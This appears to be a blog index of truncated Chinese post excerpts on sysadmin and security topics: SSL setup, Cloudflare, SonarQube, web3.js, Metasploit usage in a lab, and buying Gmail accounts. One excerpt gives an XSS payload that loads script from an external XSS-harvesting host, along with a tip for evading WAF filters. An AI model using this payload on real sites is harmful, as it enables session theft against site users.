refer to: https://www.aikaiyuan.com/10526.html 一般这样的raw 文件都很大。属于虚拟机的最原始文件。 可以这样查看 fdisk -lu m-xx_data_xvdb.raw Disk m-xx_data_xvdb.raw: 500 GiB, 536870912000 bytes, 1048576000 sectors Units: secto...

1. 我们从aliyun上拿到的ssl证书文件都是这样的: 1. 下载后是一个zip文件 2. 该文件包含了 .pem,  .key 2个文件 所以很简单, 我们使用cat 命令, 把上面2个文件组合成一个文件即可.  (记得key 文件的内容放在上面, pem的放在下面) cat *.key *.pem > new_file.cert  就可以了. ...

refer to: https://www.comparitech.com/net-admin/network-security-auditing-tools/ https://www.pcwdld.com/network-security-auditing-tools#wbounce-modal GO语言： https://blog.convisoappsec.com/en/an-int...

运营层面（日常的工作人员） 1. 做好各种日志，例如所有管理员的所有操作 2. 原则上内部系统更加容易比外部系统攻破，因为大家都很大意，默认内部用户都是 真善美 3. 严防内鬼，做好入职前的培训，说一些丑话狠话，可以很好的避免内鬼问题，特别是BOSS的亲属 4. 普通员工不要对外部私人有任何信息泄露。对外只干活，不说话。能对外说话的只有宣传部门。 5. 保密所有信息：用户数量，日活，日常在线...

传统的https的配置步骤是： 1. （在阿里云上） 购买ssl 证书 2. 下载该证书文件到服务器（.key, .pem, .crt 等等） 3. 在nginx中进行配置。(443 端口， ssl_file 等信息) 现在，使用cloudflare(免费) + 配置域名dns + nginx 80端口配置即可。 1. 在cloudflare上创建对应的site. 2. 确保每个域名都是...

以上。 具备远程会议的软件: slack, qq, 向日葵sunoray, 钉钉dingding，腾讯会议wemeet, 飞书, zoom, 其实跟安全和社工相关 一个手机号码就可以暴露你自己，或者你的朋友。 一个陌生人，拿着你的手机号，就可以轻易搜索到你的个人信息（因为app会推荐） ... 案例不说了。

load/ unload 

SonarQube是管理代码质量一个开放平台，可以快速的定位代码中潜在的或者明显的错误，下面将会介绍一下这个工具的安装、配置以及使用。 准备工作； 1、jdk（不再介绍） 2、sonarqube：http://www.sonarqube.org/downloads/ 3、SonarQube+Scanner:https://sonarsource.bintray.com/Distributio...

refer : http://www.maigg.club/home/goods.html?id=1&sid=1 其实挺无语的。很多时候gmail是需要使用的，但是国内又无法申请。 所以直接购买吧，别费劲买海外手机卡了。 推荐的渠道（15块钱，随机出现用户名） http://www.maigg.club/home/goods.html?id=1&sid=1 1.下单，付...

参考：https://blog.csdn.net/helloexp/article/details/90514367?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.baidujs&dist_request_id=&depth_1-utm_source=...

钱包中需要有钱 ( sender ) (否则会报错) contract的abi 需要正确 （abi不正确的话，就算你的调用js 代码是正确的，也会报莫名其妙的错误） web3.js 一些package的版本需要正确（ 最新版本1.7.x ，我的一些项目居然安装 0.19.x ） 网络的要求特别严格，( 我在te...

如题。 $ db_nmap   扫描 $ hosts 查看结果 hosts -u  显示UP的主机 。  -c address 只显示某个列。 设置数据库 sudo su postgres $ psql  postgres=# GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO myr...

本次的靶机是 IIS 6,  ASP 所以使用了metasploit 进行提权 1. 启动metasploit 2. search iis  20 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft...

refer to: https://doveip.com/ 1. 注册， 登录 2. 充值，可以选择 TRX 的usdt 3. 使用 3.1 获得 token curl -d "user=abcd&password=abcd" https://dvapi.doveproxy.net/cmapi.php?rq=login {"errno":200,"msg":"Success","...

参考：https://www.darkoperator.com/installing-metasploit-in-ubunt 也可以参考：  https://www.linuxidc.com/Linux/2019-01/156378.htm 安装： ubuntu下： $ apt update 1. 安装jdk:   apt install openjdk-...

metasploit 是用ruby写的。 所以本质上就是如何把自定义的module放进去。 kali下的默认位置； /usr/share/metasploit-framework/ 进来，可以发现有module文件夹，里面都是 各个cve 等漏洞的 exploit  可以放在 ~/.msf4/modules目录下， 也可以放在默认安装路径下。  我们以 cve-...

参考：https://tryhackme.com 一定要来练习

metasploit 超级超级厉害。 可以认为它就是黑客的武器库。  官网：https://github.com/rapid7/metasploit-framework/wiki 完整的文档 在这里：https://www.offensive-security.com/metasploit-unleashed/metasploit-fundamentals/ 启动 kali -...

1. XSS有专门的平台可以注册并使用。 例如  xs.sb  域名极短。 适合注入 2. 使用这个来测试： </tExtArEa><sCRipt sRC=//xsshs.cn/FxAp></scRIpt> 3. 使用onerror事件，来规避script关键字：（例如某些WAF或者editor会拦截） <img src=x on...

参考：